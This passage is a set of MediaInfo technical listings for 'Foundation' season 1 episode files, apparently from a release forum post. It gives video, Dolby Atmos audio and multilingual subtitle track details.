  741. Tagged date : UTC 2021-10-04 15:17:31


  742. Text #36

  743. ID : 47

  744. Format : Timed Text

  745. Codec ID : tx3g

  746. Duration : 49 min 35 s

  747. Bit rate mode : Variable

  748. Bit rate : 57 b/s

  749. Stream size : 20.5 KiB (0%)

  750. Title : svenska

  751. Language : Swedish

  752. Forced : No

  753. Encoded date : UTC 2021-10-04 15:17:30

  754. Tagged date : UTC 2021-10-04 15:17:31


  755. Text #37

  756. ID : 48

  757. Format : Timed Text

  758. Codec ID : tx3g

  759. Duration : 49 min 35 s

  760. Bit rate mode : Variable

  761. Bit rate : 159 b/s

  762. Stream size : 57.9 KiB (0%)

  763. Title : ?????

  764. Language : Tamil

  765. Forced : No

  766. Encoded date : UTC 2021-10-04 15:17:30

  767. Tagged date : UTC 2021-10-04 15:17:31


  768. Text #38

  769. ID : 49

  770. Format : Timed Text

  771. Codec ID : tx3g

  772. Duration : 49 min 35 s

  773. Bit rate mode : Variable

  774. Bit rate : 149 b/s

  775. Stream size : 54.3 KiB (0%)

  776. Title : ??????

  777. Language : Telugu

  778. Forced : No

  779. Encoded date : UTC 2021-10-04 15:17:30

  780. Tagged date : UTC 2021-10-04 15:17:31


  781. Text #39

  782. ID : 50

  783. Format : Timed Text

  784. Codec ID : tx3g

  785. Duration : 49 min 35 s

  786. Bit rate mode : Variable

  787. Bit rate : 132 b/s

  788. Stream size : 48.0 KiB (0%)

  789. Title : ???

  790. Language : Thai

  791. Forced : No

  792. Encoded date : UTC 2021-10-04 15:17:30

  793. Tagged date : UTC 2021-10-04 15:17:31


  794. Text #40

  795. ID : 51

  796. Format : Timed Text

  797. Codec ID : tx3g

  798. Duration : 49 min 35 s

  799. Bit rate mode : Variable

  800. Bit rate : 57 b/s

  801. Stream size : 20.6 KiB (0%)

  802. Title : Türk

  803. Language : Turkish

  804. Forced : No

  805. Encoded date : UTC 2021-10-04 15:17:30

  806. Tagged date : UTC 2021-10-04 15:17:31


  807. Text #41

  808. ID : 52

  809. Format : Timed Text

  810. Codec ID : tx3g

  811. Duration : 49 min 35 s

  812. Bit rate mode : Variable

  813. Bit rate : 82 b/s

  814. Stream size : 29.8 KiB (0%)

  815. Title : Укра?нська

  816. Language : Ukrainian

  817. Forced : No

  818. Encoded date : UTC 2021-10-04 15:17:31

  819. Tagged date : UTC 2021-10-04 15:17:31


  820. Text #42

  821. ID : 53

  822. Format : Timed Text

  823. Codec ID : tx3g

  824. Duration : 49 min 35 s

  825. Bit rate mode : Variable

  826. Bit rate : 73 b/s

  827. Stream size : 26.6 KiB (0%)

  828. Title : Ti?ng Vi?t

  829. Language : Vietnamese

  830. Forced : No

  831. Encoded date : UTC 2021-10-04 15:17:31

  832. Tagged date : UTC 2021-10-04 15:17:31




复制代码

  1. ##### MediaInfo ######

  2. General

  3. Complete name : Foundation.S01E02[email protected]BBQDDQ.COM.mp4

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom)

  7. File size : 13.9 GiB

  8. Duration : 1 h 1 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 32.2 Mb/s

  11. Encoded date : UTC 2021-10-04 15:00:09

  12. Tagged date : UTC 2021-10-04 15:00:09


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. HDR format : Dolby Vision, Version 1.0, dvhe.05.06, BL+RPU

  19. Codec ID : dvhe

  20. Codec ID/Info : High Efficiency Video Coding with Dolby Vision

  21. Duration : 1 h 1 min

  22. Bit rate : 24.5 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 920 pixels

  25. Display aspect ratio : 2.000

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.138

  32. Stream size : 10.5 GiB (76%)

  33. Default : No

  34. Encoded date : UTC 2021-10-04 14:55:30

  35. Tagged date : UTC 2021-10-04 15:02:33

  36. Codec configuration box : hvcC+dvcC


  37. Audio #1

  38. ID : 2

  39. Format : E-AC-3 JOC

  40. Format/Info : Enhanced AC-3 with Joint Object Coding

  41. Commercial name : Dolby Digital Plus with Dolby Atmos

  42. Codec ID : ec-3

  43. Duration : 1 h 1 min

  44. Bit rate mode : Constant

  45. Bit rate : 768 kb/s

  46. Maximum bit rate : 811 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : L R C LFE Ls Rs

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 31.250 FPS (1536 SPF)

  51. Compression mode : Lossy

  52. Stream size : 339 MiB (2%)

  53. Title : English

  54. Language : English

  55. Service kind : Complete Main

  56. Encoded date : UTC 2021-10-04 15:01:17

  57. Tagged date : UTC 2021-10-04 15:02:33

  58. Complexity index : Not present / 16

  59. Number of dynamic objects : 15

  60. Bed channel count : 1 channel

  61. Bed channel configuration : LFE


  62. Audio #2

  63. ID : 3

  64. Format : E-AC-3 JOC

  65. Format/Info : Enhanced AC-3 with Joint Object Coding

  66. Commercial name : Dolby Digital Plus with Dolby Atmos

  67. Codec ID : ec-3

  68. Duration : 1 h 1 min

  69. Bit rate mode : Constant

  70. Bit rate : 768 kb/s

  71. Maximum bit rate : 811 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 339 MiB (2%)

  78. Title : Fran?ais

  79. Language : French

  80. Service kind : Complete Main

  81. Encoded date : UTC 2021-10-04 15:01:27

  82. Tagged date : UTC 2021-10-04 15:02:33

  83. Complexity index : Not present / 16

  84. Number of dynamic objects : 15

  85. Bed channel count : 1 channel

  86. Bed channel configuration : LFE


  87. Audio #3

  88. ID : 4

  89. Format : E-AC-3 JOC

  90. Format/Info : Enhanced AC-3 with Joint Object Coding

  91. Commercial name : Dolby Digital Plus with Dolby Atmos

  92. Codec ID : ec-3

  93. Duration : 1 h 1 min

  94. Bit rate mode : Constant

  95. Bit rate : 768 kb/s

  96. Maximum bit rate : 811 kb/s

  97. Channel(s) : 6 channels

  98. Channel layout : L R C LFE Ls Rs

  99. Sampling rate : 48.0 kHz

  100. Frame rate : 31.250 FPS (1536 SPF)

  101. Compression mode : Lossy

  102. Stream size : 339 MiB (2%)

  103. Title : Fran?ais

  104. Language : French

  105. Service kind : Complete Main

  106. Encoded date : UTC 2021-10-04 15:01:35

  107. Tagged date : UTC 2021-10-04 15:02:33

  108. Complexity index : Not present / 16

  109. Number of dynamic objects : 15

  110. Bed channel count : 1 channel

  111. Bed channel configuration : LFE


  112. Audio #4

  113. ID : 5

  114. Format : E-AC-3 JOC

  115. Format/Info : Enhanced AC-3 with Joint Object Coding

  116. Commercial name : Dolby Digital Plus with Dolby Atmos

  117. Codec ID : ec-3

  118. Duration : 1 h 1 min

  119. Bit rate mode : Constant

  120. Bit rate : 768 kb/s

  121. Maximum bit rate : 811 kb/s

  122. Channel(s) : 6 channels

  123. Channel layout : L R C LFE Ls Rs

  124. Sampling rate : 48.0 kHz

  125. Frame rate : 31.250 FPS (1536 SPF)

  126. Compression mode : Lossy

  127. Stream size : 339 MiB (2%)

  128. Title : Deutsch

  129. Language : German

  130. Service kind : Complete Main

  131. Encoded date : UTC 2021-10-04 15:01:42

  132. Tagged date : UTC 2021-10-04 15:02:33

  133. Complexity index : Not present / 16

  134. Number of dynamic objects : 15

  135. Bed channel count : 1 channel

  136. Bed channel configuration : LFE


  137. Audio #5

  138. ID : 6

  139. Format : E-AC-3 JOC

  140. Format/Info : Enhanced AC-3 with Joint Object Coding

  141. Commercial name : Dolby Digital Plus with Dolby Atmos

  142. Codec ID : ec-3

  143. Duration : 1 h 1 min

  144. Bit rate mode : Constant

  145. Bit rate : 768 kb/s

  146. Maximum bit rate : 811 kb/s

  147. Channel(s) : 6 channels

  148. Channel layout : L R C LFE Ls Rs

  149. Sampling rate : 48.0 kHz

  150. Frame rate : 31.250 FPS (1536 SPF)

  151. Compression mode : Lossy

  152. Stream size : 339 MiB (2%)

  153. Title : Italiano

  154. Language : Italian

  155. Service kind : Complete Main

  156. Encoded date : UTC 2021-10-04 15:01:49

  157. Tagged date : UTC 2021-10-04 15:02:33

  158. Complexity index : Not present / 16

  159. Number of dynamic objects : 15

  160. Bed channel count : 1 channel

  161. Bed channel configuration : LFE


  162. Audio #6

  163. ID : 7

  164. Format : E-AC-3 JOC

  165. Format/Info : Enhanced AC-3 with Joint Object Coding

  166. Commercial name : Dolby Digital Plus with Dolby Atmos

  167. Codec ID : ec-3

  168. Duration : 1 h 1 min

  169. Bit rate mode : Constant

  170. Bit rate : 768 kb/s

  171. Maximum bit rate : 811 kb/s

  172. Channel(s) : 6 channels

  173. Channel layout : L R C LFE Ls Rs

  174. Sampling rate : 48.0 kHz

  175. Frame rate : 31.250 FPS (1536 SPF)

  176. Compression mode : Lossy

  177. Stream size : 339 MiB (2%)

  178. Title : 日本語

  179. Language : Japanese

  180. Service kind : Complete Main

  181. Encoded date : UTC 2021-10-04 15:01:56

  182. Tagged date : UTC 2021-10-04 15:02:33

  183. Complexity index : Not present / 16

  184. Number of dynamic objects : 15

  185. Bed channel count : 1 channel

  186. Bed channel configuration : LFE


  187. Audio #7

  188. ID : 8

  189. Format : E-AC-3 JOC

  190. Format/Info : Enhanced AC-3 with Joint Object Coding

  191. Commercial name : Dolby Digital Plus with Dolby Atmos

  192. Codec ID : ec-3

  193. Duration : 1 h 1 min

  194. Bit rate mode : Constant

  195. Bit rate : 768 kb/s

  196. Maximum bit rate : 811 kb/s

  197. Channel(s) : 6 channels

  198. Channel layout : L R C LFE Ls Rs

  199. Sampling rate : 48.0 kHz

  200. Frame rate : 31.250 FPS (1536 SPF)

  201. Compression mode : Lossy

  202. Stream size : 339 MiB (2%)

  203. Title : Português

  204. Language : Portuguese

  205. Service kind : Complete Main

  206. Encoded date : UTC 2021-10-04 15:02:02

  207. Tagged date : UTC 2021-10-04 15:02:33

  208. Complexity index : Not present / 16

  209. Number of dynamic objects : 15

  210. Bed channel count : 1 channel

  211. Bed channel configuration : LFE


  212. Audio #8

  213. ID : 9

  214. Format : E-AC-3 JOC

  215. Format/Info : Enhanced AC-3 with Joint Object Coding

  216. Commercial name : Dolby Digital Plus with Dolby Atmos

  217. Codec ID : ec-3

  218. Duration : 1 h 1 min

  219. Bit rate mode : Constant

  220. Bit rate : 768 kb/s

  221. Maximum bit rate : 811 kb/s

  222. Channel(s) : 6 channels

  223. Channel layout : L R C LFE Ls Rs

  224. Sampling rate : 48.0 kHz

  225. Frame rate : 31.250 FPS (1536 SPF)

  226. Compression mode : Lossy

  227. Stream size : 339 MiB (2%)

  228. Title : русский язык

  229. Language : Russian

  230. Service kind : Complete Main

  231. Encoded date : UTC 2021-10-04 15:02:09

  232. Tagged date : UTC 2021-10-04 15:02:33

  233. Complexity index : Not present / 16

  234. Number of dynamic objects : 15

  235. Bed channel count : 1 channel

  236. Bed channel configuration : LFE


  237. Audio #9

  238. ID : 10

  239. Format : E-AC-3 JOC

  240. Format/Info : Enhanced AC-3 with Joint Object Coding

  241. Commercial name : Dolby Digital Plus with Dolby Atmos

  242. Codec ID : ec-3

  243. Duration : 1 h 1 min

  244. Bit rate mode : Constant

  245. Bit rate : 768 kb/s

  246. Maximum bit rate : 811 kb/s

  247. Channel(s) : 6 channels

  248. Channel layout : L R C LFE Ls Rs

  249. Sampling rate : 48.0 kHz

  250. Frame rate : 31.250 FPS (1536 SPF)

  251. Compression mode : Lossy

  252. Stream size : 339 MiB (2%)

  253. Title : Espa?ol?(Latinoamérica)

  254. Language : Spanish

  255. Service kind : Complete Main

  256. Encoded date : UTC 2021-10-04 15:02:15

  257. Tagged date : UTC 2021-10-04 15:02:33

  258. Complexity index : Not present / 16

  259. Number of dynamic objects : 15

  260. Bed channel count : 1 channel

  261. Bed channel configuration : LFE


  262. Audio #10

  263. ID : 11

  264. Format : E-AC-3 JOC

  265. Format/Info : Enhanced AC-3 with Joint Object Coding

  266. Commercial name : Dolby Digital Plus with Dolby Atmos

  267. Codec ID : ec-3

  268. Duration : 1 h 1 min

  269. Bit rate mode : Constant

  270. Bit rate : 768 kb/s

  271. Maximum bit rate : 811 kb/s

  272. Channel(s) : 6 channels

  273. Channel layout : L R C LFE Ls Rs

  274. Sampling rate : 48.0 kHz

  275. Frame rate : 31.250 FPS (1536 SPF)

  276. Compression mode : Lossy

  277. Stream size : 339 MiB (2%)

  278. Title : Espa?ol?(Espa?a)

  279. Language : Spanish

  280. Service kind : Complete Main

  281. Encoded date : UTC 2021-10-04 15:02:21

  282. Tagged date : UTC 2021-10-04 15:02:33

  283. Complexity index : Not present / 16

  284. Number of dynamic objects : 15

  285. Bed channel count : 1 channel

  286. Bed channel configuration : LFE


  287. Text #1

  288. ID : 12

  289. Format : Timed Text

  290. Codec ID : tx3g

  291. Duration : 1 h 0 min

  292. Bit rate mode : Variable

  293. Bit rate : 56 b/s

  294. Stream size : 24.6 KiB (0%)

  295. Title : English

  296. Language : English

  297. Forced : No

  298. Encoded date : UTC 2021-10-04 15:02:27

  299. Tagged date : UTC 2021-10-04 15:02:33


  300. Text #2

  301. ID : 13

  302. Format : Timed Text

  303. Codec ID : tx3g

  304. Duration : 1 h 1 min

  305. Bit rate mode : Variable

  306. Bit rate : 79 b/s

  307. Stream size : 35.7 KiB (0%)

  308. Title : ????

  309. Language : Arabic

  310. Forced : No

  311. Encoded date : UTC 2021-10-04 15:02:27

  312. Tagged date : UTC 2021-10-04 15:02:33


  313. Text #3

  314. ID : 14

  315. Format : Timed Text

  316. Codec ID : tx3g

  317. Duration : 1 h 1 min

  318. Bit rate mode : Variable

  319. Bit rate : 81 b/s

  320. Stream size : 36.8 KiB (0%)

  321. Title : български

  322. Language : Bulgarian

  323. Forced : No

  324. Encoded date : UTC 2021-10-04 15:02:27

  325. Tagged date : UTC 2021-10-04 15:02:33


  326. Text #4

  327. ID : 15

  328. Format : Timed Text

  329. Codec ID : tx3g

  330. Duration : 1 h 1 min

  331. Bit rate mode : Variable

  332. Bit rate : 54 b/s

  333. Stream size : 24.3 KiB (0%)

  334. Title : ?esky

  335. Language : Czech

  336. Forced : No

  337. Encoded date : UTC 2021-10-04 15:02:27

  338. Tagged date : UTC 2021-10-04 15:02:33


  339. Text #5

  340. ID : 16

  341. Format : Timed Text

  342. Codec ID : tx3g

  343. Duration : 1 h 1 min

  344. Bit rate mode : Variable

  345. Bit rate : 56 b/s

  346. Stream size : 25.1 KiB (0%)

  347. Title : dansk

  348. Language : Danish

  349. Forced : No

  350. Encoded date : UTC 2021-10-04 15:02:28

  351. Tagged date : UTC 2021-10-04 15:02:33


  352. Text #6

  353. ID : 17

  354. Format : Timed Text

  355. Codec ID : tx3g

  356. Duration : 1 h 1 min

  357. Bit rate mode : Variable

  358. Bit rate : 51 b/s

  359. Stream size : 22.9 KiB (0%)

  360. Title : Nederlands

  361. Language : Dutch

  362. Forced : No

  363. Encoded date : UTC 2021-10-04 15:02:28

  364. Tagged date : UTC 2021-10-04 15:02:33


  365. Text #7

  366. ID : 18

  367. Format : Timed Text

  368. Codec ID : tx3g

  369. Duration : 1 h 1 min

  370. Bit rate mode : Variable

  371. Bit rate : 52 b/s

  372. Stream size : 23.7 KiB (0%)

  373. Title : eesti keel

  374. Language : Estonian

  375. Forced : No

  376. Encoded date : UTC 2021-10-04 15:02:28

  377. Tagged date : UTC 2021-10-04 15:02:33


  378. Text #8

  379. ID : 19

  380. Format : Timed Text

  381. Codec ID : tx3g

  382. Duration : 1 h 1 min

  383. Bit rate mode : Variable

  384. Bit rate : 55 b/s

  385. Stream size : 25.0 KiB (0%)

  386. Title : Vlaams

  387. Language : Finnish

  388. Forced : No

  389. Encoded date : UTC 2021-10-04 15:02:28

  390. Tagged date : UTC 2021-10-04 15:02:33


  391. Text #9

  392. ID : 20

  393. Format : Timed Text

  394. Codec ID : tx3g

  395. Duration : 1 h 1 min

  396. Bit rate mode : Variable

  397. Bit rate : 56 b/s

  398. Stream size : 25.2 KiB (0%)

  399. Title : Fran?ais

  400. Language : French

  401. Forced : No

  402. Encoded date : UTC 2021-10-04 15:02:28

  403. Tagged date : UTC 2021-10-04 15:02:33


  404. Text #10

  405. ID : 21

  406. Format : Timed Text

  407. Codec ID : tx3g

  408. Duration : 1 h 1 min

  409. Bit rate mode : Variable

  410. Bit rate : 56 b/s

  411. Stream size : 25.2 KiB (0%)

  412. Title : Fran?ais

  413. Language : French

  414. Forced : No

  415. Encoded date : UTC 2021-10-04 15:02:28

  416. Tagged date : UTC 2021-10-04 15:02:33


  417. Text #11

  418. ID : 22

  419. Format : Timed Text

  420. Codec ID : tx3g

  421. Duration : 1 h 1 min

  422. Bit rate mode : Variable

  423. Bit rate : 56 b/s

  424. Stream size : 25.2 KiB (0%)

  425. Title : Fran?ais

  426. Language : French

  427. Forced : No

  428. Encoded date : UTC 2021-10-04 15:02:28

  429. Tagged date : UTC 2021-10-04 15:02:33


  430. Text #12

  431. ID : 23

  432. Format : Timed Text

  433. Codec ID : tx3g

  434. Duration : 1 h 1 min

  435. Bit rate mode : Variable

  436. Bit rate : 58 b/s

  437. Stream size : 26.2 KiB (0%)

  438. Title : Deutsch

  439. Language : German

  440. Forced : No

  441. Encoded date : UTC 2021-10-04 15:02:28

  442. Tagged date : UTC 2021-10-04 15:02:33


  443. Text #13

  444. ID : 24

  445. Format : Timed Text

  446. Codec ID : tx3g

  447. Duration : 1 h 1 min

  448. Bit rate mode : Variable

  449. Bit rate : 90 b/s

  450. Stream size : 40.7 KiB (0%)

  451. Title : ελληνικ?

  452. Language : Greek

  453. Forced : No

  454. Encoded date : UTC 2021-10-04 15:02:29

  455. Tagged date : UTC 2021-10-04 15:02:33


  456. Text #14

  457. ID : 25

  458. Format : Timed Text

  459. Codec ID : tx3g

  460. Duration : 1 h 1 min

  461. Bit rate mode : Variable

  462. Bit rate : 72 b/s

  463. Stream size : 32.7 KiB (0%)

  464. Title : ????

  465. Language : Hebrew

  466. Forced : No

  467. Encoded date : UTC 2021-10-04 15:02:29

  468. Tagged date : UTC 2021-10-04 15:02:33


  469. Text #15

  470. ID : 26

  471. Format : Timed Text

  472. Codec ID : tx3g

  473. Duration : 1 h 1 min

  474. Bit rate mode : Variable

  475. Bit rate : 141 b/s

  476. Stream size : 63.8 KiB (0%)

  477. Title : ??????

  478. Language : Hindi

  479. Forced : No

  480. Encoded date : UTC 2021-10-04 15:02:29

  481. Tagged date : UTC 2021-10-04 15:02:33


  482. Text #16

  483. ID : 27

  484. Format : Timed Text

  485. Codec ID : tx3g

  486. Duration : 1 h 1 min

  487. Bit rate mode : Variable

  488. Bit rate : 54 b/s

  489. Stream size : 24.3 KiB (0%)

  490. Title : Magyar

  491. Language : Hungarian

  492. Forced : No

  493. Encoded date : UTC 2021-10-04 15:02:29

  494. Tagged date : UTC 2021-10-04 15:02:33


  495. Text #17

  496. ID : 28

  497. Format : Timed Text

  498. Codec ID : tx3g

  499. Duration : 1 h 1 min

  500. Bit rate mode : Variable

  501. Bit rate : 60 b/s

  502. Stream size : 27.0 KiB (0%)

  503. Title : Indonesia

  504. Language : Indonesian

  505. Forced : No

  506. Encoded date : UTC 2021-10-04 15:02:29

  507. Tagged date : UTC 2021-10-04 15:02:33


  508. Text #18

  509. ID : 29

  510. Format : Timed Text

  511. Codec ID : tx3g

  512. Duration : 1 h 1 min

  513. Bit rate mode : Variable

  514. Bit rate : 57 b/s

  515. Stream size : 25.8 KiB (0%)

  516. Title : Italiano

  517. Language : Italian

  518. Forced : No

  519. Encoded date : UTC 2021-10-04 15:02:29

  520. Tagged date : UTC 2021-10-04 15:02:33


  521. Text #19

  522. ID : 30

  523. Format : Timed Text

  524. Codec ID : tx3g

  525. Duration : 1 h 1 min

  526. Bit rate mode : Variable

  527. Bit rate : 51 b/s

  528. Stream size : 22.9 KiB (0%)

  529. Title : 日本語

  530. Language : Japanese

  531. Forced : No

  532. Encoded date : UTC 2021-10-04 15:02:29

  533. Tagged date : UTC 2021-10-04 15:02:33


  534. Text #20

  535. ID : 31

  536. Format : Timed Text

  537. Codec ID : tx3g

  538. Duration : 1 h 1 min

  539. Bit rate mode : Variable

  540. Bit rate : 58 b/s

  541. Stream size : 26.1 KiB (0%)

  542. Title : ???

  543. Language : Korean

  544. Forced : No

  545. Encoded date : UTC 2021-10-04 15:02:30

  546. Tagged date : UTC 2021-10-04 15:02:33


  547. Text #21

  548. ID : 32

  549. Format : Timed Text

  550. Codec ID : tx3g

  551. Duration : 1 h 1 min

  552. Bit rate mode : Variable

  553. Bit rate : 55 b/s

  554. Stream size : 25.0 KiB (0%)

  555. Title : lietuvi? kalba

  556. Language : Lithuanian

  557. Forced : No

  558. Encoded date : UTC 2021-10-04 15:02:30

  559. Tagged date : UTC 2021-10-04 15:02:33


  560. Text #22

  561. ID : 33

  562. Format : Timed Text

  563. Codec ID : tx3g

  564. Duration : 1 h 1 min

  565. Bit rate mode : Variable

  566. Bit rate : 56 b/s

  567. Stream size : 25.5 KiB (0%)

  568. Title : latvie?u valoda

  569. Language : Latvian

  570. Forced : No

  571. Encoded date : UTC 2021-10-04 15:02:30

  572. Tagged date : UTC 2021-10-04 15:02:33


  573. Text #23

  574. ID : 34

  575. Format : Timed Text

  576. Codec ID : tx3g

  577. Duration : 1 h 1 min

  578. Bit rate mode : Variable

  579. Bit rate : 56 b/s

  580. Stream size : 25.2 KiB (0%)

  581. Title : ???? ?????

  582. Language : Malay

  583. Forced : No

  584. Encoded date : UTC 2021-10-04 15:02:30

  585. Tagged date : UTC 2021-10-04 15:02:33


  586. Text #24

  587. ID : 35

  588. Format : Timed Text

  589. Codec ID : tx3g

  590. Duration : 1 h 1 min

  591. Bit rate mode : Variable

  592. Bit rate : 49 b/s

  593. Stream size : 22.2 KiB (0%)

  594. Title : 中文(简体)

  595. Language : Chinese

  596. Forced : No

  597. Encoded date : UTC 2021-10-04 15:02:30

  598. Tagged date : UTC 2021-10-04 15:02:33


  599. Text #25

  600. ID : 36

  601. Format : Timed Text

  602. Codec ID : tx3g

  603. Duration : 1 h 1 min

  604. Bit rate mode : Variable

  605. Bit rate : 49 b/s

  606. Stream size : 22.3 KiB (0%)

  607. Title : 中文(繁體)

  608. Language : Chinese

  609. Forced : No

  610. Encoded date : UTC 2021-10-04 15:02:30

  611. Tagged date : UTC 2021-10-04 15:02:33


  612. Text #26

  613. ID : 37

  614. Format : Timed Text

  615. Codec ID : tx3g

  616. Duration : 1 h 1 min

  617. Bit rate mode : Variable

  618. Bit rate : 50 b/s

  619. Stream size : 22.4 KiB (0%)

  620. Title : 中文(粤语)

  621. Language : Chinese

  622. Forced : No

  623. Encoded date : UTC 2021-10-04 15:02:31

  624. Tagged date : UTC 2021-10-04 15:02:33


  625. Text #27

  626. ID : 38

  627. Format : Timed Text

  628. Codec ID : tx3g

  629. Duration : 1 h 1 min

  630. Bit rate mode : Variable

  631. Bit rate : 54 b/s

  632. Stream size : 24.6 KiB (0%)

  633. Title : norsk

  634. Language : Norwegian

  635. Forced : No

  636. Encoded date : UTC 2021-10-04 15:02:31

  637. Tagged date : UTC 2021-10-04 15:02:33


  638. Text #28

  639. ID : 39

  640. Format : Timed Text

  641. Codec ID : tx3g

  642. Duration : 1 h 1 min

  643. Bit rate mode : Variable

  644. Bit rate : 53 b/s

  645. Stream size : 24.1 KiB (0%)

  646. Title : J?zyk polski

  647. Language : Polish

  648. Forced : No

  649. Encoded date : UTC 2021-10-04 15:02:31

  650. Tagged date : UTC 2021-10-04 15:02:33


  651. Text #29

  652. ID : 40

  653. Format : Timed Text

  654. Codec ID : tx3g

  655. Duration : 1 h 1 min

  656. Bit rate mode : Variable

  657. Bit rate : 56 b/s

  658. Stream size : 25.1 KiB (0%)

  659. Title : Português

  660. Language : Portuguese

  661. Forced : No

  662. Encoded date : UTC 2021-10-04 15:02:31

  663. Tagged date : UTC 2021-10-04 15:02:33


  664. Text #30

  665. ID : 41

  666. Format : Timed Text

  667. Codec ID : tx3g

  668. Duration : 1 h 1 min

  669. Bit rate mode : Variable

  670. Bit rate : 54 b/s

  671. Stream size : 24.2 KiB (0%)

  672. Title : Português

  673. Language : Portuguese

  674. Forced : No

  675. Encoded date : UTC 2021-10-04 15:02:31

  676. Tagged date : UTC 2021-10-04 15:02:33


  677. Text #31

  678. ID : 42

  679. Format : Timed Text

  680. Codec ID : tx3g

  681. Duration : 1 h 1 min

  682. Bit rate mode : Variable

  683. Bit rate : 81 b/s

  684. Stream size : 36.5 KiB (0%)

  685. Title : русский язык

  686. Language : Russian

  687. Forced : No

  688. Encoded date : UTC 2021-10-04 15:02:31

  689. Tagged date : UTC 2021-10-04 15:02:33


  690. Text #32

  691. ID : 43

  692. Format : Timed Text

  693. Codec ID : tx3g

  694. Duration : 1 h 1 min

  695. Bit rate mode : Variable

  696. Bit rate : 53 b/s

  697. Stream size : 23.8 KiB (0%)

  698. Title : sloven?ina

  699. Language : Slovak

  700. Forced : No

  701. Encoded date : UTC 2021-10-04 15:02:31

  702. Tagged date : UTC 2021-10-04 15:02:33


  703. Text #33

  704. ID : 44

  705. Format : Timed Text

  706. Codec ID : tx3g

  707. Duration : 1 h 1 min

  708. Bit rate mode : Variable

  709. Bit rate : 48 b/s

  710. Stream size : 21.9 KiB (0%)

  711. Title : sloven??ina

  712. Language : Slovenian

  713. Forced : No

  714. Encoded date : UTC 2021-10-04 15:02:32

  715. Tagged date : UTC 2021-10-04 15:02:33


  716. Text #34

  717. ID : 45

  718. Format : Timed Text

  719. Codec ID : tx3g

  720. Duration : 1 h 1 min

  721. Bit rate mode : Variable

  722. Bit rate : 56 b/s

  723. Stream size : 25.3 KiB (0%)

  724. Title : Espa?ol?(Latinoamérica)

  725. Language : Spanish

  726. Forced : No

  727. Encoded date : UTC 2021-10-04 15:02:32

  728. Tagged date : UTC 2021-10-04 15:02:33


  729. Text #35

  730. ID : 46

  731. Format : Timed Text

  732. Codec ID : tx3g

  733. Duration : 1 h 1 min

  734. Bit rate mode : Variable

  735. Bit rate : 56 b/s

  736. Stream size : 25.3 KiB (0%)

  737. Title : Espa?ol?(Espa?a)

  738. Language : Spanish

  739. Forced : No

  740. Encoded date : UTC 2021-10-04 15:02:32

  741. Tagged date : UTC 2021-10-04 15:02:33


  742. Text #36

  743. ID : 47

  744. Format : Timed Text

  745. Codec ID : tx3g

  746. Duration : 1 h 1 min

  747. Bit rate mode : Variable

  748. Bit rate : 56 b/s

  749. Stream size : 25.1 KiB (0%)

  750. Title : svenska

  751. Language : Swedish

  752. Forced : No

  753. Encoded date : UTC 2021-10-04 15:02:32

  754. Tagged date : UTC 2021-10-04 15:02:33


  755. Text #37

  756. ID : 48

  757. Format : Timed Text

  758. Codec ID : tx3g

  759. Duration : 1 h 1 min

  760. Bit rate mode : Variable

  761. Bit rate : 158 b/s

  762. Stream size : 71.3 KiB (0%)

  763. Title : ?????

  764. Language : Tamil

  765. Forced : No

  766. Encoded date : UTC 2021-10-04 15:02:32

  767. Tagged date : UTC 2021-10-04 15:02:33


  768. Text #38

  769. ID : 49

  770. Format : Timed Text

  771. Codec ID : tx3g

  772. Duration : 1 h 1 min

  773. Bit rate mode : Variable

  774. Bit rate : 145 b/s

  775. Stream size : 65.6 KiB (0%)

  776. Title : ??????

  777. Language : Telugu

  778. Forced : No

  779. Encoded date : UTC 2021-10-04 15:02:32

  780. Tagged date : UTC 2021-10-04 15:02:33


  781. Text #39

  782. ID : 50

  783. Format : Timed Text

  784. Codec ID : tx3g

  785. Duration : 1 h 1 min

  786. Bit rate mode : Variable

  787. Bit rate : 131 b/s

  788. Stream size : 59.1 KiB (0%)

  789. Title : ???

  790. Language : Thai

  791. Forced : No

  792. Encoded date : UTC 2021-10-04 15:02:32

  793. Tagged date : UTC 2021-10-04 15:02:33


  794. Text #40

  795. ID : 51

  796. Format : Timed Text

  797. Codec ID : tx3g

  798. Duration : 1 h 1 min

  799. Bit rate mode : Variable

  800. Bit rate : 57 b/s

  801. Stream size : 25.7 KiB (0%)

  802. Title : Türk

  803. Language : Turkish

  804. Forced : No

  805. Encoded date : UTC 2021-10-04 15:02:33

  806. Tagged date : UTC 2021-10-04 15:02:33


  807. Text #41

  808. ID : 52

  809. Format : Timed Text

  810. Codec ID : tx3g

  811. Duration : 1 h 1 min

  812. Bit rate mode : Variable

  813. Bit rate : 84 b/s

  814. Stream size : 37.8 KiB (0%)

  815. Title : Укра?нська

  816. Language : Ukrainian

  817. Forced : No

  818. Encoded date : UTC 2021-10-04 15:02:33

  819. Tagged date : UTC 2021-10-04 15:02:33


  820. Text #42

  821. ID : 53

  822. Format : Timed Text

  823. Codec ID : tx3g

  824. Duration : 1 h 1 min

  825. Bit rate mode : Variable

  826. Bit rate : 74 b/s

  827. Stream size : 33.4 KiB (0%)

  828. Title : Ti?ng Vi?t

  829. Language : Vietnamese

  830. Forced : No

  831. Encoded date : UTC 2021-10-04 15:02:33

  832. Tagged date : UTC 2021-10-04 15:02:33




复制代码

  1. ##### MediaInfo ######

  2. General

  3. Complete name : Foundation.S01E01.[email protected]BBQDDQ.COM.mp4

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom)

  7. File size : 15.6 GiB

  8. Duration : 1 h 9 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 32.2 Mb/s

  11. Encoded date : UTC 2021-10-04 14:39:05

  12. Tagged date : UTC 2021-10-04 14:39:05


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

